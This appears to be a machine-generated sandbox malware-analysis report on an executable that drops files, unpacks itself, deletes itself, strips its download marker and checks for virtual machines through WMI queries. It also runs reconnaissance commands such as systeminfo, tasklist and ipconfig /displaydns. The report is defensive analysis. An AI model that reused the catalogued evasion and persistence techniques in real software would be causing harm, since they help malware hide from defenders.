                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
                Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: KTh1gQlT9a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeUnpacked PE file: 0.2.KTh1gQlT9a.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\esjbbriUnpacked PE file: 4.2.esjbbri.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\E647.exeUnpacked PE file: 6.2.E647.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\uejbbriUnpacked PE file: 7.2.uejbbri.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB8778EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,8_2_00007FF7CB8778EC
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_02601540 pushad ; ret 0_2_02601550
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_0265D85C push eax; retf 0_2_0265D85D
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_02672227 pushfd ; iretd 0_2_02672228
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_0267172A push B63524ADh; retn 001Fh0_2_02671761
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeCode function: 0_2_02673387 push esp; ret 0_2_02673389
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_004014D9 pushad ; ret 4_2_004014E9
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_004031DB push eax; ret 4_2_004032AB
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_02521540 pushad ; ret 4_2_02521550
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_026E1B2F pushfd ; iretd 4_2_026E1B30
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_026E1032 push B63524ADh; retn 001Fh4_2_026E1069
                Source: C:\Users\user\AppData\Roaming\esjbbriCode function: 4_2_026E2C8F push esp; ret 4_2_026E2C91
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_0040100B push esi; ret 6_2_0040100C
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_0040280E push esp; ret 6_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_0040281F push esp; ret 6_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_00402822 push esp; ret 6_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_00401328 push edi; retf 6_2_0040132A
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004027ED push esp; ret 6_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_004027FB push esp; ret 6_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E2854 push esp; ret 6_2_024E2A2D
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E2862 push esp; ret 6_2_024E2A2D
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E2875 push esp; ret 6_2_024E2A2D
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E1072 push esi; ret 6_2_024E1073
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E1909 push esp; iretd 6_2_024E19BF
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E2889 push esp; ret 6_2_024E2A2D
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E1386 push edi; retf 6_2_024E1391
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_024E2886 push esp; ret 6_2_024E2A2D
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_02681A39 push 9A832F1Fh; iretd 6_2_02681A3F
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_026802CB push edi; retf 6_2_026802CC
                Source: C:\Users\user\AppData\Local\Temp\E647.exeCode function: 6_2_0267FFB4 push esi; ret 6_2_0267FFB5

                Persistence and Installation Behavior

                barindex
                Uses ipconfig to lookup or modify the Windows network settings
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E647.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\esjbbriJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uejbbriJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B575.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uejbbriJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\esjbbriJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Deletes itself after installation
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\kth1gqlt9a.exeJump to behavior
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\esjbbri:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\uejbbri:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Checks if the current machine is a virtual machine (disk enumeration)
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Found evasive API chain (may stop execution after checking mutex)
                Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_12-884
                Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                Source: C:\Users\user\AppData\Local\Temp\B575.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
                Source: C:\Users\user\AppData\Local\Temp\B575.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
                Source: C:\Users\user\AppData\Local\Temp\B575.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Source: C:\Users\user\AppData\Roaming\esjbbriAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\AppData\Roaming\esjbbriAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Source: C:\Users\user\AppData\Local\Temp\E647.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\AppData\Local\Temp\E647.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Source: C:\Users\user\AppData\Roaming\uejbbriAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\AppData\Roaming\uejbbriAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: esjbbri, 00000004.00000002.2365317103.00000000026BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03221016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,12_2_03221016
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 440Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1411Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 622Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1302Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 884Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 865Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 2919Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2564Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 4321
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4229
                Source: C:\Users\user\AppData\Local\Temp\B575.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_8-4390
                Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 9.8 %
